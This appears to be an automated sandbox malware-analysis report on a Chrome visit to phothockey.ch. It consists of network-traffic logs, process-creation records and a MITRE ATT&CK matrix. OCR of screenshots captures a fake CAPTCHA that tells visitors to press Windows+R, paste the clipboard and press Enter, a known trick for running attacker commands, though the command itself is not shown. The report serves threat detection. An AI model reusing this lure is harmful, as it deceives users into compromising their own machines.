            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50352
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50354
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50356
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 50442 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50367
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50370
            Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50308
            Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50302
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50301
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50318
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50310
            Source: unknownNetwork traffic detected: HTTP traffic on port 50454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50326
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
            Source: unknownNetwork traffic detected: HTTP traffic on port 50286 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50400 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
            Source: unknownNetwork traffic detected: HTTP traffic on port 50377 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
            Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
            Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
            Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50458 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
            Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
            Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
            Source: unknownNetwork traffic detected: HTTP traffic on port 50456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 50318 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
            Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
            Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50272
            Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50271
            Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
            Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50274
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
            Source: unknownNetwork traffic detected: HTTP traffic on port 50242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50281
            Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50282
            Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50446 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50285
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50284
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50286
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50292
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50291
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
            Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50448 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
            Source: unknownNetwork traffic detected: HTTP traffic on port 50229 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
            Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
            Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
            Source: unknownNetwork traffic detected: HTTP traffic on port 50367 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
            Source: unknownNetwork traffic detected: HTTP traffic on port 50438 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
            Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50426 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50217 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
            Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:50156 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:50163 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:50176 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:50179 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:50208 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:50412 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:50442 version: TLS 1.2
            Source: classification engineClassification label: mal60.phis.win@31/283@183/813
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1808,i,3970310272871863177,2319313575735297340,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://phothockey.ch"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1808,i,3970310272871863177,2319313575735297340,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Persistence and Installation Behavior

            barindex
            Source: screenshotOCR Text: x e about:blank PHOTHOCKEY - Page d'accueil X phothackey.ch Complete these Verification Steps To better prove you are not a robot. please: I. Press & hold the Windows Key + R 2. In the verification window, press Ctrl + V 3. Press Enter on your keyboard to finish. You will observe and agree: t not a robot rrCA91CHA Verification Perform the steps above to finish verification. Optimized by Optimole 1&36 ENG p Type here to search SG WOI/2025
            Source: Chrome DOM: 1.8OCR Text: Complete these Verification Steps To better prove you are not a robot please: Press hold the Windows Key" R. In the verification window. press Ctrl + V. 2. Press Enter on your keyboard to finishi 3. You will Observe and agree: Perform the steps above to VERIFY finish verification, Optimized by Optimole
            Source: screenshotOCR Text: x e about:blank PHOTHOCKEY - Page d'accueil X phothackey.ch Complete these Verification Steps To better prove you are not a robot. please: I. Press & hold the Windows Key + R 2. In the verification window, press Ctrl + V 3. Press Enter on your keyboard to finish. You will observe and agree: t not a robot rrCA91CHA Verification Perform the steps above to _NIFY finish verification. Optimized by Optimole 1&36 ENG p Type here to search SG WOI/2025
            Source: screenshotOCR Text: x e about:blank PHOTHOCKEY - Page d'accueil X phothackey.ch Complete these Verification Steps To better prove you are not a robot. please: I. Press & hold the Windows Key + R 2. In the verification window, press Ctrl + V 3. Press Enter on your keyboard to finish. You will observe and agree: t not a robot rrCA91CHA Verification Perform the steps above to VFOIFY finish verification. Optimized by Optimole 1&36 ENG p Type here to search SG WOI/2025
            Source: Chrome DOM: 1.7OCR Text: Complete these Verification Steps To better prove you are not a robot. please: 1. Press & hold the Windows Key + R 2. In the verification window, press Ctrl + V 3. Press Enter on your keyboard to finish. You will observe and agree: t reCAPtCHA Perform the steps above to VERIFY finish verification. Optimized by Optimole
            Source: screenshotOCR Text: x e about:blank PHOTHOCKEY - Page d'accueil x X phothackey.ch Complete these Verification Steps 11 To better prove you are not a robot. please: I. Press & hold the Windows Key + R 2. In the verification window, press Ctrl + V 3. Press Enter on your keyboard to finish. You will observe and agree: t not a robot rrCA91CHA Verification Perform the steps above to finish verification. Optimized by Optimole 1&36 ENG p Type here to search SG WOI/2025
            Source: Chrome DOM: 1.10OCR Text: Complete these Verification Steps TO better prove you are not a robot, please: Press & hold the Windows Key" + R. In the verification window. press Ctrl + V, 2. Press Enter on your keyboard to finish, 3. You will observe and agree: t reCAPtCHA Perform the steps above to VERIFY finish verification. Optimized by Optimole
            Source: Chrome DOM: 1.20OCR Text: Complete these Verification Steps TO better prove you are not a robot, please: Press & hold the Windows Key" + R. In the verification window. press Ctrl + V, 2. Press Enter on your keyboard to finish, 3. You will observe and agree: t reCAPtOA Perform the steps above to VERIFY finish verification. Optimized by Optimole
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            Browser Extensions
            1
            Process Injection
            1
            Masquerading
            OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Registry Run Keys / Startup Folder
            1
            Registry Run Keys / Startup Folder
            1
            Process Injection
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
